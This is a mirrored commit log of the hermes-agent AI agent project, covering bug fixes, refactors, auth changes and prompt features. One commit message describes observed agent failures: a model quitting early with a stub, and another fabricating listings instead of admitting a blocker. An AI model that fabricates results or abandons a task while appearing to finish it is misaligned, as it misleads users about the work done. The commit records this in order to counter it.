hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-06-10 08:32:09 +00:00

Author	SHA1	Message	Date
teknium1	fb0ab27649	fix(agent): register explainer config key + shorten footer prefix Follow-up to the salvaged #34452 turn-completion explainer: - Register display.turn_completion_explainer: True in DEFAULT_CONFIG so the setting is discoverable, matching the file_mutation_verifier precedent. - Shorten the repeated footer prefix from 'Turn ended without a usable reply: ' to 'No reply: ' so the 10 reason variants don't all open with the same 8-word boilerplate. - Update the 7 assertions that referenced the old prefix.	2026-05-29 19:23:05 -07:00
Teknium	bcc8301000	Inspired by Claude Code: /compress here [N] — boundary-aware 'summarize up to here' (#35048 ) Adds a user-chosen compression boundary to the existing /compress command. /compress here [N] summarizes everything except the most recent N exchanges (default 2), which are preserved verbatim — letting the user pick the compression boundary instead of relying on the automatic token-budget heuristic. Inspired by Claude Code's Rewind 'Summarize up to here' action (v2.1.139, Week 20, May 2026): https://code.claude.com/docs/en/whats-new/2026-w20 - hermes_cli/partial_compress.py: pure split/parse helpers + seam-alternation guard (shared by CLI and gateway). - cli.py / gateway/run.py: route 'here [N]' / '--keep N' to partial compression; compress only the head, re-append the verbatim tail through the seam guard. - Preserves message-flow role alternation (seam guard merges any illegal user->user / assistant->assistant adjacency). - Reuses the existing _compress_context session-rotation/lock machinery — no changes to the compression core. - Bare /compress (full) and /compress <focus> behavior unchanged. Tests: 12 helper unit tests + 5 CLI integration tests + E2E (interleaved tool-call transcript, degenerate/multimodal seams, real handler path).	2026-05-29 17:49:15 -07:00
Bartok9	54aa4db1de	fix(cli): remove Hermes-managed node/npm/npx symlinks on uninstall The POSIX installer drops node/npm/npx symlinks in ~/.local/bin pointing into $HERMES_HOME/node and prepends ~/.local/bin to PATH, shadowing an existing nvm. Uninstall removed the hermes wrapper but left these behind, so the user's default node/npm/npx stayed redirected after uninstall. Add remove_node_symlinks() and call it from run_uninstall. It removes ~/.local/bin/{node,npm,npx} only when each is a symlink resolving into the current Hermes home's node dir, so a link the user repointed at nvm or a real binary is never touched. Handles dangling links too. Closes #34536	2026-05-29 17:24:38 -07:00
Teknium	689ef5e233	feat(cli): warn on unsupported pip installs + fix stale update-check cache (#34491 ) (#34846 ) * docs(code-execution): document HERMES_* env narrowing + passthrough workaround The execute_code sandbox-child env scrub (`108397726`, #27303) deliberately dropped the broad HERMES_ prefix passthrough, keeping only an operational 4-var allowlist (HERMES_HOME/PROFILE/CONFIG/ENV). A script that relied on a non-secret HERMES_* var (HERMES_BASE_URL, HERMES_KANBAN_DB, HERMES__WEBHOOK, or a plugin-defined one) now sees it unset in the child. Document the behavior change and the two recovery routes (terminal.env_passthrough in config.yaml, or required_environment_variables in skill frontmatter), plus the debug log line that surfaces the drop for diagnosis. feat(cli): warn on unsupported pip installs + fix stale update-check cache after pip upgrade Banner now shows a yellow warning when detect_install_method() == 'pip': 'pip install hermes-agent' isn't the supported install path (it exists on PyPI for internal/CI reasons), so updates and issue support don't behave correctly. Reuses existing install-method detection; warn, never block. Also fixes #34491: check_for_updates() keyed its 6h cache only on ts+rev. On the pip path (no HERMES_REVISION), rev is always None, so a 'pip install --upgrade' changed VERSION but left the cache valid — the stale 'N commits behind' count survived the upgrade. Cache now also keys on the installed VERSION and invalidates on mismatch.	2026-05-29 13:30:28 -07:00
Teknium	3a2c03061c	fix(stt,tts): restore mistralai — 2.4.8 is clean, ban lifted (#34841 ) * docs(code-execution): document HERMES_* env narrowing + passthrough workaround The execute_code sandbox-child env scrub (`108397726`, #27303) deliberately dropped the broad HERMES_ prefix passthrough, keeping only an operational 4-var allowlist (HERMES_HOME/PROFILE/CONFIG/ENV). A script that relied on a non-secret HERMES_* var (HERMES_BASE_URL, HERMES_KANBAN_DB, HERMES__WEBHOOK, or a plugin-defined one) now sees it unset in the child. Document the behavior change and the two recovery routes (terminal.env_passthrough in config.yaml, or required_environment_variables in skill frontmatter), plus the debug log line that surfaces the drop for diagnosis. fix(stt,tts): restore mistralai — 2.4.8 is clean, ban lifted PyPI quarantined mistralai on 2026-05-12 after the malicious 2.4.6 release (Mini Shai-Hulud worm). 2.4.6 has since been removed from the registry and clean releases resumed (2.4.7 2026-05-25, 2.4.8 2026-05-28). This rolls back the blanket runtime ban so Voxtral STT + TTS work again, following the restoration checklist the repo left in pyproject.toml. Verified against the real SDK: 2.4.8 keeps the import path the code uses (from mistralai.client import Mistral) and the audio.transcriptions.complete / audio.speech.complete surfaces. Changes: - pyproject.toml: re-add mistral extra pinned to mistralai==2.4.8; left OUT of [all] per the 2026-05-12 lazy-install policy (one quarantined release must not break fresh installs). uv.lock regenerated. - tools/lazy_deps.py: add stt.mistral / tts.mistral entries so the SDK lazy-installs on first use (matches edge / elevenlabs). - tools/transcription_tools.py: restore explicit-provider gate (_HAS_MISTRAL + key) and auto-detect entry (local>groq>openai>mistral>xai); _transcribe_mistral lazy-installs before import. - tools/tts_tool.py: dispatcher routes back to _generate_mistral_tts; _import_mistral_client lazy-installs the SDK. - hermes_cli/tools_config.py, hermes_cli/web_server.py: un-hide Mistral from the TTS provider picker and dashboard STT options. - hermes_cli/security_advisories.py: KEEP the shai-hulud-2026-05 advisory (module policy forbids removal) — it is scoped to 2.4.6 only, so it still warns anyone with the poisoned build cached and never fires on 2.4.8. Summary note updated to reflect the un-quarantine. - tests: revert the disabled-behavior assertions added by the ban commit back to routing/positive expectations; add mistral to the lazy-installable-extras-excluded-from-[all] contract. Reported by @SkYNewZ (#34503). Validation: 189 targeted STT/TTS/lazy_deps/metadata tests pass; E2E with the real mistralai 2.4.8 SDK routes both STT and TTS to mistral.	2026-05-29 13:24:12 -07:00
Bartok9	3845d86b93	fix(cron): restore jobs.json emptied by config migration on update Config-version migrations have been observed to leave cron/jobs.json valid-but-empty after `hermes update`, silently dropping every scheduled job (#34600). The existing malformed-shape guards in cron/jobs.py don't catch this because {"jobs": []} is valid JSON. Add restore_cron_jobs_if_emptied() as a post-migration safety net: if the live cron/jobs.json now has zero jobs while the pre-update snapshot held one or more, restore the snapshot copy in place and warn loudly. The check is conservative — it only restores on unambiguous evidence of loss (snapshot had jobs, live file readable-and-empty), so a user who genuinely cleared their jobs is never second-guessed and an unreadable live file is left untouched so real corruption still surfaces. Wired into _cmd_update_impl after migrate_config(), reusing the existing pre-update quick snapshot (which already captures cron/jobs.json). Closes #34600	2026-05-29 13:22:54 -07:00
teknium1	a1cb5fa2c7	fix(gateway): anchor service WorkingDirectory at HERMES_HOME, not the source checkout The systemd unit (and launchd plist) pinned WorkingDirectory to PROJECT_ROOT (the checkout the unit was generated from). When that checkout is transient — a git worktree, or a clone hermes update later relocates/removes — the path rots. systemd then fails the start at the CHDIR step (status=200/CHDIR) BEFORE Python loads, so the on-boot refresh_systemd_unit_if_needed() self-heal never runs and Restart=always crash-loops forever on a dead directory. Observed in the wild: a gateway that crash-looped 153 times overnight, bot offline until a manual 'hermes gateway restart' regenerated the unit. Anchor cwd at HERMES_HOME instead — it never moves, always exists, and the gateway never needed cwd to be the checkout (ExecStart uses an absolute python + -m hermes_cli.main). Existing broken units now differ from the generated unit and self-heal on the next start/restart/update.	2026-05-29 12:36:59 -07:00
teknium1	8836b3a113	fix(cli): widen Windows .bat wrapper fix to custom-name alias path The profile alias --name path in main.py rewrote the wrapper with a hardcoded #!/bin/sh script right after create_wrapper_script(), clobbering the .bat on Windows and reintroducing the exact bug for custom aliases. create_wrapper_script() now takes an optional target so the alias file is named after the alias while the -p content references the profile — one platform-aware code path, no post-hoc rewrite.	2026-05-29 12:32:47 -07:00
liuhao1024	6312dd8c3a	fix(cli): create .bat wrapper on Windows instead of POSIX shell script On Windows, hermes profile create produced a #!/bin/sh script that the shell cannot execute. Now creates a .bat file with @echo off + %* on Windows, and keeps the POSIX shell script on macOS/Linux. Also fixes check_alias_collision to use 'where' instead of 'which' on Windows, and remove_wrapper_script to find .bat files. Fixes #34708	2026-05-29 12:32:47 -07:00
zapabob	aa283d1e4f	fix(model): isolate custom provider picker credentials	2026-05-29 12:32:35 -07:00
Teknium	27a2c4f36f	fix(mcp): stop reporting false OAuth success when no token was obtained (#34807 ) * docs(code-execution): document HERMES_* env narrowing + passthrough workaround The execute_code sandbox-child env scrub (`108397726`, #27303) deliberately dropped the broad HERMES_ prefix passthrough, keeping only an operational 4-var allowlist (HERMES_HOME/PROFILE/CONFIG/ENV). A script that relied on a non-secret HERMES_* var (HERMES_BASE_URL, HERMES_KANBAN_DB, HERMES__WEBHOOK, or a plugin-defined one) now sees it unset in the child. Document the behavior change and the two recovery routes (terminal.env_passthrough in config.yaml, or required_environment_variables in skill frontmatter), plus the debug log line that surfaces the drop for diagnosis. fix(mcp): stop reporting false OAuth success when no token was obtained `hermes mcp login` reported "Authenticated — N tool(s) available" for servers that serve tools/list without auth (e.g. Google's official Drive MCP server) even when the OAuth flow never completed — dynamic client registration 400'd because the provider doesn't support RFC 7591, so no token was ever acquired. Every real tool call then hung until timeout with no indication of why. Login now verifies a token actually landed on disk after the probe. When it didn't, it warns that authentication didn't complete and shows the config needed to supply a pre-registered client_id/client_secret (the existing, already-supported workaround for DCR-less providers). Adds a docs pitfall for Google Drive / Atlassian-style providers. Fixes #34775	2026-05-29 12:32:19 -07:00
alt-glitch	a4c18f65d4	feat(video_gen): wire Nous subscription override into hermes tools UX Add the same managed-gateway UX that image_gen already has: - TOOL_CATEGORIES['video_gen'] gets a 'Nous Subscription' provider row with managed_nous_feature='video_gen' + video_gen_plugin_name='fal' - NousSubscriptionFeatures gains a video_gen property + feature state computation (managed/active/available using the fal-queue gateway) - _GATEWAY_TOOL_LABELS, _GATEWAY_DIRECT_LABELS, _ALL_GATEWAY_KEYS, _get_gateway_direct_credentials, opted_in all include video_gen - apply_nous_managed_defaults and apply_gateway_defaults handle video_gen - _is_toolset_satisfied checks Nous features for video_gen - _is_provider_active detects managed video_gen (use_gateway + fal provider) - _select_plugin_video_gen_provider accepts use_gateway kwarg, propagated from all 4 call sites in _configure_provider when managed_feature is set - hermes setup status shows 'Video Generation (FAL via Nous subscription)' Users on a Nous subscription can now pick 'Nous Subscription' under hermes tools → Video Generation, which sets video_gen.provider=fal + video_gen.use_gateway=true. The FAL plugin's _resolve_managed_fal_video_gateway then routes through the managed queue gateway — no FAL_KEY needed.	2026-05-29 22:26:24 +05:30
teknium1	904c0b479b	refactor(state): return FTS index count from vacuum() Have vacuum() return optimize_fts()'s count so the CLI 'sessions optimize' summary uses the real merged-index count instead of probing the private _FTS_TABLES / _fts_table_exists() members.	2026-05-29 05:09:56 -07:00
kshitijk4poor	38695254f8	perf(state): merge FTS5 segments on VACUUM + add 'hermes sessions optimize' The FTS5 indexes (messages_fts, messages_fts_trigram) grow as a series of incremental b-tree segments — one per trigger-driven insert batch. SQLite's automerge caps at ~16 segments, so a long-lived store keeps scanning many segments per MATCH and never collapses them unless the special 'optimize' command runs. Nothing in the codebase ever ran it: vacuum() only fired after a prune that deleted rows, and even then never merged FTS segments. Changes: - SessionDB.optimize_fts(): merges each FTS5 index to a single segment, probing for the (optional/lazy) trigram table first so it is safe to call unconditionally. Layout-only — search results and snippet() are unchanged. - vacuum() now calls optimize_fts() before VACUUM so freed index pages are returned to the OS in the same pass. - 'hermes sessions optimize' CLI subcommand for on-demand reclamation + segment compaction (previously there was no way to compact the store without a prune deleting rows), with before/after size reporting. Benchmark (8000 msgs, fragmented to 8 segments/index): - segments 8 -> 1 on both indexes - porter MATCH 5.5x faster (0.449 -> 0.081 ms/q) - trigram MATCH 3.0x faster (0.632 -> 0.207 ms/q) - 8000 matches before == 8000 after, identical row ids (no functional change) Orthogonal to the structural FTS-size PRs (#20239 external-content, #27770 optional trigram) — segment merge helps regardless of those. Tests: TestOptimizeFts covers index count, search+snippet preservation, missing-trigram path, and idempotency. Full test_hermes_state.py green (227).	2026-05-29 05:09:56 -07:00
Teknium	5e7c2ffa9f	chore(models): gemini-3.5-flash replaces gemini-3-flash-preview in OpenRouter + Nous lists (#34581 ) * chore(models): swap gemini-3-flash-preview for gemini-3.5-flash in OpenRouter + Nous lists * chore(models): regenerate model-catalog.json for gemini-3.5-flash swap	2026-05-29 04:27:58 -07:00
teknium1	ddaf2f6712	style: restore PEP8 blank-line separation after dead-code removal The deletions in the salvaged commit left some top-level defs/classes separated by a single blank line. Restore the 2-blank-line separation.	2026-05-29 04:22:27 -07:00
kshitijk4poor	dc235e93cb	chore: remove dead code — 28 unused functions/classes across 16 files Vulture + per-symbol verification (whole-repo grep incl. tests, string literals, getattr, decorator/registry/argparse dispatch) confirmed each of these has zero callers anywhere — not reachable via any dynamic-dispatch path, not referenced by tests, not re-exported. Removed: - acp_adapter/tools.py: _build_patch_mode_content - agent/anthropic_adapter.py: read_claude_managed_key (diagnostics-only, never called) - agent/bedrock_adapter.py: get_bedrock_model_ids - agent/browser_registry.py: get_active_browser_provider - agent/chat_completion_helpers.py: _take_request_client (x2 nested closures, never invoked) - gateway/platforms/weixin.py: _rewrite_headers_for_weixin, _rewrite_table_block_for_weixin - hermes_cli/banner.py: _skin_branding - hermes_cli/debug.py: _delete_hint - hermes_cli/gateway.py: _setup_email, _setup_sms, _setup_yuanbao (platform keys absent from the _builtin_setup_fn dispatch dict; handled by the _setup_standard_platform fallback) - hermes_cli/kanban_db.py: set_max_runtime, active_run - hermes_cli/kanban_diagnostics.py: severity_of_highest, _latest_clean_event_ts - hermes_cli/main.py: _build_provider_choices, cmd_portal (portal subcommand is wired via portal_cli.add_parser, not this wrapper) - hermes_cli/model_switch.py: CustomAutoResult (orphaned by the switch_model() extraction) - hermes_cli/models.py: format_model_pricing_table, fetch_nous_account_tier - hermes_cli/portal_cli.py: _nous_portal_base_url - hermes_cli/proxy/server.py: handle_models_fallback (defined but never registered on the router) - tools/computer_use/cua_backend.py: _parse_element, _is_arm_mac - tools/file_operations.py: _get_safe_write_root (prod uses the imported agent.file_safety.get_safe_write_root directly) - tools/skills_tool.py: _load_category_description Also dropped two imports left unused by the removals: - tools/file_operations.py: get_safe_write_root alias - tools/computer_use/cua_backend.py: import platform Pure deletion: -551 LOC. No behavior change. Test files covering the edited modules pass (640/640); the broader suite's pre-existing/env-dependent failures reproduce unchanged on origin/main.	2026-05-29 04:22:27 -07:00
Teknium	e4b9532c18	feat: embedder environment-hint hook for the system prompt (#34574 ) * fix(security): block AWS SDK creds from subprocess env * fix(security): narrow Bedrock subprocess strip to inference bearer token only Scopes the AWS_SDK subprocess strip down from the full AWS credential chain to just AWS_BEARER_TOKEN_BEDROCK — the only Hermes-managed inference secret (analogous to OPENAI_API_KEY). The general AWS credential chain (AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN / AWS_PROFILE / config + role pointers) is intentionally left inheritable. Why: per SECURITY.md §3.2 the local terminal is the user's trusted operator shell. Hard-blocklisting the general chain would (a) regress every user who runs aws/terraform/cdk/boto3 in the agent terminal — not just Bedrock users, since PROVIDER_REGISTRY is iterated unconditionally at import — and (b) be unrecoverable, because env_passthrough.py refuses to re-allow anything in _HERMES_PROVIDER_ENV_BLOCKLIST (GHSA-rhgp-j443-p4rf). The narrow strip closes the reported leak (opencode enumerating the Bedrock catalog off the leaked bearer token) with no capability loss. Keeps zapabob's self-healing auth_type=="aws_sdk" mechanism so any future SDK-cred provider is covered automatically. Tests: bearer token stripped + general chain preserved (no-regression guard), on both the runtime strip path and the blocklist-membership path. Co-authored-by: zapabob <1920071390@campus.ouj.ac.jp> * feat: embedder environment-hint hook for the system prompt Adds HERMES_ENVIRONMENT_HINT env var (and config.yaml agent.environment_hint) so a host wrapping Hermes (sandbox runner, managed platform) can describe the runtime environment — proxy, credential handling, mount layout — in the system prompt's environment-hints block, without editing the identity slot (SOUL.md). Read once at prompt-build time, so it lands in the stable, cache-safe portion of the system prompt. Env var overrides the config key (build-time/container mechanism). Empty by default — no behavior change for existing installs. --------- Co-authored-by: zapabob <1920071390@campus.ouj.ac.jp>	2026-05-29 04:10:05 -07:00
kshitijk4poor	a22c250001	refactor(auth): remove vestigial Nous min_key_ttl/inference_auth_mode params After the legacy session-key path was removed, two parameters became dead surface on the Nous runtime-resolution chain: - min_key_ttl_seconds: del'd inside refresh_nous_oauth_pure and pass-through / telemetry-only in refresh_nous_oauth_from_state, _try_import_shared_nous_state, _nous_device_code_login, and resolve_nous_runtime_credentials. It controlled the now-deleted agent-key mint TTL and drives no behavior. - inference_auth_mode: with the legacy mode gone, AUTO and FRESH are behaviorally identical; the value only fed _normalize_nous_inference_auth_mode validation and oauth trace output, never a branch. Removing inference_auth_mode orphaned its whole supporting cluster (NOUS_INFERENCE_AUTH_MODE_AUTO/FRESH, NOUS_INFERENCE_AUTH_MODES, _normalize_nous_inference_auth_mode), and dropping min_key_ttl_seconds orphaned DEFAULT_AGENT_KEY_MIN_TTL_SECONDS — all deleted here. Updated every caller (run_agent, auxiliary_client, credential_pool, proxy adapter, runtime_provider, web_server, main, auth_commands, setup) and pruned the matching test kwargs. Deleted two tests that exercised the removed surface (test_legacy_auth_mode_is_rejected, test_try_refresh_..._accepts_explicit_auth_mode). No behavior change: net -134 LOC of dead code.	2026-05-29 02:24:48 -07:00
Robin Fernandes	7e958dafc2	fix(auth): address Nous JWT fallback review	2026-05-29 02:24:48 -07:00
Robin Fernandes	41ff6e5937	refactor(auth): Disable Nous legacy session key fallback	2026-05-29 02:24:48 -07:00
teknium1	369075dc95	feat(tools): progressive tool disclosure for MCP and plugin tools Adds Tool Search, a structured-tools progressive-disclosure layer that replaces MCP and non-core plugin tools in the model-visible tools array with three bridge tools (tool_search / tool_describe / tool_call) when the deferrable surface would consume more than a configurable percentage of the active model's context window. Core Hermes tools are never deferred. Default mode is 'auto' with a 10% context threshold, so small toolsets pay no overhead. Set tools.tool_search.enabled to 'on' to force or 'off' to disable. Design carefully reflects the OpenClaw production failure modes documented in the openclaw-tool-search-report: - Core tools never defer (toolsets._HERMES_CORE_TOOLS). Addresses the 'tools silently missing from isolated cron turns' regression class (openclaw#84141) by construction: there is no code path that can drop a core tool. - Catalog is stateless across turns — rebuilt from the live tool-defs list on every assembly. No session-keyed Map that can drift out of sync with the registry. - tool_call unwraps the bridge call before any hook fires, so plugin pre/post hooks, guardrails, approval flows, and the activity feed all see the underlying tool name, not the bridge (addresses openclaw#85588 and the verbose-mode complaint on openclaw#79823). - The unwrap happens in both the parallel and sequential paths of agent/tool_executor.py and also in handle_function_call, so direct callers (sandboxed code, eval harnesses) are covered too. - Bridge tools cannot invoke each other (recursion guard) and cannot invoke core tools (those must be called directly). - Tools mode only — no JS-sandbox code-mode. Keeps the surface small. - Token estimation via cheap char/4 heuristic; precision isn't needed for the threshold decision. Files: - tools/tool_search.py — new module (BM25 retrieval, classification, threshold gate, bridge dispatch, unwrap helper). - tests/tools/test_tool_search.py — 35 tests including the OpenClaw #84141 regression guard. - model_tools.py — wires assembly into _compute_tool_definitions as the final step, adds skip_tool_search_assembly kwarg so the bridge can see the real catalog, dispatches the three bridge tools. - agent/tool_executor.py — unwraps tool_call in both parallel and sequential parsing loops so checkpointing, guardrails, plugin hooks, and tool-progress callbacks all observe the underlying tool name. - hermes_cli/config.py — DEFAULT_CONFIG['tools']['tool_search'] block. - website/docs/user-guide/features/tool-search.md — user docs. Validation: - 35/35 new tests pass. - Existing tool/registry/model_tools/config/coercion/executor tests (82 + 74 + small adjacents) green. - Live E2E: 20 fake MCP tools registered, get_tool_definitions returns 3 bridges, tool_search returns top 3 hits, tool_describe returns full schema, tool_call dispatches to the real underlying handler and the underlying result is what the model sees. - Reserved-name recursion guard verified live. - Core-tool refusal via tool_call verified live.	2026-05-29 02:04:12 -07:00
Teknium	c01a2df0a3	fix(auth): don't launch a text-mode browser inside the terminal for OAuth (#34479 ) OAuth auto-open only checked _is_remote_session() (SSH + cloud-shell env vars). On a headless/CLI-only Linux box with no GUI browser, none of those trip, so webbrowser.open() resolved to a console browser (w3m/lynx/links) and launched it INSIDE the terminal — hijacking the user's TTY with the xAI 'Account Management' login page instead of letting them copy the URL. Add _can_open_graphical_browser(): returns False when webbrowser would resolve to a known console browser, when $BROWSER names one, when there's no display server on Linux, or when no browser resolves at all. Gate all 5 OAuth auto-open callsites (xAI loopback, Spotify loopback, MiniMax device code, Anthropic, Google) on it in addition to the existing remote check. Headless boxes now print the URL / fall through to manual-paste instead.	2026-05-29 01:23:06 -07:00
wysie	f32b66c758	fix: improve plugins list usability	2026-05-29 00:59:42 -07:00
Blake	26b83a5f5f	fix(cli): ignore terminal focus reports (salvage of #16780 ) Ghostty/macOS window or tab navigation (Cmd+Shift+[ / ], Alt+Tab, etc.) can deliver terminal focus reports (CSI I / CSI O) to the running TUI. prompt_toolkit does not map those sequences by default, so its parser falls back to literal key presses (ESC, [, I/O) and inserts `[I` / `[O` into the prompt buffer after the ESC byte is handled. Fix: register the two sequences as Keys.Ignore in ANSI_SEQUENCES at parser level, plus a no-op kb.add(Keys.Ignore) handler so the default self-insert path never inserts focus-report bytes. Salvage notes: original PR put the helper in cli.py. Salvaged into hermes_cli/pt_input_extras.py alongside install_shift_enter_alias / install_ctrl_enter_alias to match the established pattern for ANSI_SEQUENCES augmentation. setdefault → in-check so any prior user registration wins. Closes #16780	2026-05-29 00:31:44 -07:00
teknium1	f2d88c820c	fix(model-catalog): fall through to raw.github when Vercel 403s; swap step-3.5-flash for step-3.7-flash on OpenRouter+Nous The docs site (Vercel) serves /docs/api/model-catalog.json behind a bot mitigation rule that returns HTTP 403 + x-vercel-mitigated: challenge for non-browser User-Agents — including urllib (what the CLI uses) and curl. When that happens, get_catalog() falls back to the stale disk cache and new model releases (Opus 4.8, etc.) never reach the /model picker even though they're already in OPENROUTER_MODELS and the live OpenRouter API. Adds a fallback URL chain: when the primary catalog URL fails, walk DEFAULT_CATALOG_FALLBACK_URLS — currently the raw.githubusercontent.com copy of the same file. GitHub raw doesn't bot-gate, so the manifest stays reachable through Vercel firewall hiccups. Per-provider override URLs keep their direct-fetch semantics (operators configure those specifically, no implicit fallback). Also swaps stepfun/step-3.5-flash for stepfun/step-3.7-flash in the OpenRouter + Nous Portal curated picker lists. Native stepfun provider configuration (api.stepfun.ai) is left alone — that depends on what stepfun.ai itself serves, not what OpenRouter routes. Test plan: 5 new TestFallbackChain tests cover primary-success, primary-failure-fallback-success, all-fail, primary==fallback-dedup, and end-to-end get_catalog routing through the new helper. Existing 23 tests in test_model_catalog.py still pass (28 total). Wider tests/hermes_cli/ sweep: 5701/5701 pass.	2026-05-29 00:25:36 -07:00
teknium1	592a4ffb6b	fix(kanban): close three blocked/iteration-exhausted handling gaps (#29747 ) Reporter diagnosed three independent gaps that together allowed infinite 'unblock → re-stuck' loops with no surfacing or escalation: GAP 1: `_rule_stuck_in_blocked` resets timer on any `commented`/`unblocked` event, so a task that cycles every few minutes is invisible to it regardless of how many times it cycles. Fix: new `_rule_block_unblock_cycling` rule (`hermes_cli/kanban_diagnostics.py`) that counts block→unblock cycles in a sliding window. Default threshold 3 cycles within 24h, configurable via `block_cycle_threshold` / `block_cycle_window_seconds`. Walks events in arrival order (event id) since multiple events can share the same `created_at` second. Fires as a warning with a CLI hint to inspect the block reasons. GAP 2: Iteration-budget-exhausted runs in kanban workers map to `kanban_block` (status=blocked, but a clean exit from the kernel's perspective). `_rule_repeated_failures` reads `consecutive_failures`, which `_record_task_failure` increments only for crashed/timed_out/ spawn_failed — `blocked` outcome bypasses the failure counter, so the `kanban.failure_limit` circuit breaker never trips on budget-exhaustion loops. Fix: `agent/conversation_loop.py` budget-exhaustion path now calls `_record_task_failure(outcome="timed_out")` instead of `kanban_block`. Budget exhaustion is genuinely a timeout-shaped failure (the task ran out of allowed iterations), so this is more honest semantics; it also routes through the unified failure counter, so repeated budget exhaustions trip the circuit breaker and the task auto-blocks with `gave_up` after `failure_limit` retries. GAP 3: `release_stale_claims` uses `_pid_alive(worker_pid)` only and ignores `last_heartbeat_at`. Reporter observed a 91-min run that held its claim with frozen heartbeat because the worker entered a logic loop with no tool calls — `_pid_alive` kept returning True so the claim was extended every 15 minutes indefinitely. Fix: heartbeat-stale backstop. If `last_heartbeat_at` is set AND older than `DEFAULT_CLAIM_HEARTBEAT_MAX_STALE_SECONDS` (default 1h), reclaim even if the PID is alive. NULL `last_heartbeat_at` preserves backward compatibility (no heartbeat yet = extend, as before). The reclaim event payload now includes a `heartbeat_stale` boolean so operators see why a live-PID worker was reclaimed. This works cleanly in concert with PR #34418 (#31752 runtime → heartbeat bridge): once `_touch_activity` keeps `last_heartbeat_at` fresh as a side effect of normal API traffic, the backstop only fires for genuinely wedged workers (no chunks, no tool results, no progress at all). Co-authored-by: baofuen <45189813+baofuen@users.noreply.github.com>	2026-05-29 00:13:29 -07:00
teknium1	ae6817f7f7	fix(kanban): add --reason flag to unblock for symmetry with block (#30897 ) `hermes kanban unblock <id> review-required: ...` parsed every trailing word as another task_id (since `task_ids` is `nargs='+'`), then quietly failed on each non-existent id with "cannot unblock review-required: (not blocked/scheduled?)". Reporter saw this as asymmetric with `block <id> <reason...>` which accepts positional reason words. Fix: add a `--reason "..."` flag that, when provided, is appended as a `UNBLOCK: <reason>` comment before the unblock transition. Bulk syntax (`unblock t_a t_b t_c`) is preserved unchanged. Co-authored-by: julio-cloudvisor <211828103+julio-cloudvisor@users.noreply.github.com>	2026-05-28 23:41:44 -07:00
wysie	a0fc3df878	fix(browser): rewrite Camofox Docker loopback URLs (#25541 ) Co-authored-by: Wysie <wysie@users.noreply.github.com>	2026-05-29 15:43:55 +10:00
kshitijk4poor	66827f8947	chore: prune unused imports and duplicate import redefinitions Remove unused imports (F401) and duplicate/shadowed import redefinitions (F811) across the codebase using ruff's safe autofixes. No behavioral changes -- imports only. - ~1400 safe autofixes applied across 644 files (net -1072 lines) - __init__.py re-exports preserved (excluded from F401 removal so public re-export surfaces stay intact) - Re-exports that are imported or monkeypatched by tests but look unused in their defining module are kept with explicit # noqa: F401 (gateway/run.py load_dotenv; run_agent re-exports from agent.message_sanitization, agent.context_compressor, agent.retry_utils, agent.prompt_builder, agent.process_bootstrap, agent.codex_responses_adapter) - Unsafe F841 (unused-variable) fixes deliberately skipped -- those can change behavior when the RHS has side effects - ruff lints remain disabled in pyproject.toml (only PLW1514 is selected); this is a one-time cleanup, not a config change Verification: - python -m compileall: clean - pytest --collect-only: all 27161 tests collect (zero import errors) - core entry points import clean (run_agent, model_tools, cli, toolsets, hermes_state, batch_runner, gateway) - static scan: every name any test imports directly from an edited module still resolves	2026-05-28 22:26:25 -07:00
Teknium	a4d8f0f62a	feat(prompt): universal task-completion guidance + local Python toolchain probe (#34340 ) * fix(codex): surface error code in Responses 'failed' status errors When a Codex Responses turn ends with status=failed, the response carries the failure details under `response.error` as `{code, message, param, ...}`. The previous extractor pulled only `message`, so users seeing a rate-limit failure got a bare "Slow down" string indistinguishable from a generic stream truncation; an internal_error with empty message degraded to a dict dump ("{'code': 'internal_error', 'message': ''}"). Extract a `_format_responses_error()` helper that: - prefixes `code` when both code and message are present (e.g. 'rate_limit_exceeded: Slow down') - falls back to the bare `code` when message is empty - accepts both dict and attribute-style payloads (SDK and JSON-RPC paths) - preserves the prior status-only fallback when no error payload exists Apply the same helper at the sibling site in `codex_app_server_session.run_turn()` so codex-CLI subprocess turn failures get the same treatment. Tests: - 8 new unit tests for `_format_responses_error` covering both shapes, empty/missing fields, non-string fields, and the status-only fallback. - 2 regression tests on `_normalize_codex_response` for failed status with and without a code, asserting the exact RuntimeError message. - All 3603 tests in tests/agent/ pass. Adapted from anomalyco/opencode#28757. * feat(prompt): universal task-completion guidance + local Python toolchain probe Two cross-model failure modes get a single-line answer in the cached system prompt. Both gated by config (default on), both add zero overhead when not needed, both verified via real AIAgent prompt builds. ## What changed `TASK_COMPLETION_GUIDANCE` — short prompt block applied to ALL models. Targets two failure modes observed on a real Sarasota real-estate build task: (1) Opus stopped after writing an 85-byte stub and gave a prose response with finish_reason=stop on call #3 of 90; (2) DeepSeek pushed through a PEP-668 wall, then returned fabricated listings instead of admitting the blocker. Both behaviors are model-family-agnostic, so the guidance lives outside the existing tool_use_enforcement gate (~192 tokens, paid once per session via prefix cache). `tools/env_probe.py` — local Python toolchain probe. Detects python3/pip/uv/PEP-668 state and emits ONE short line in the system prompt when something is non-default. Emits NOTHING when the env is clean (zero token cost for normal users). Skipped entirely for remote terminal backends (docker/modal/ssh) — they have their own probe. Example output on a broken environment (the actual case): Python toolchain: python3=3.11.15 (no pip module), python=missing (use python3), pip→python3.12 (mismatch), PEP 668=yes (use venv or uv). ## Config Both flags live under `agent.` in config.yaml, default True: agent: task_completion_guidance: true # universal "finish the job" block environment_probe: true # local Python toolchain hints Neither addition required a `_config_version` bump — deep-merge fills defaults in for existing user configs. ## Validation \| Test surface \| Result \| \|---\|---\| \| tests/tools/test_env_probe.py \| 10/10 pass (probe unit) \| \| tests/run_agent/test_run_agent.py — new classes \| 8/8 pass (integration) \| \| TestToolUseEnforcementConfig \| 17/17 pass (no regression) \| \| TestBuildSystemPrompt \| 9/9 pass (no regression) \| \| TestInvalidateSystemPrompt \| 2/2 pass (no regression) \| \| tests/agent/test_prompt_builder.py \| 124/124 pass (no regression) \| \| tests/hermes_cli/ \| 5662/5662 pass (config defaults) \| \| E2E AIAgent build (broken env) \| Both blocks present, 2,178 chars \| \| E2E AIAgent build (clean env) \| 771-char net overhead, env probe silent \|	2026-05-28 22:26:09 -07:00
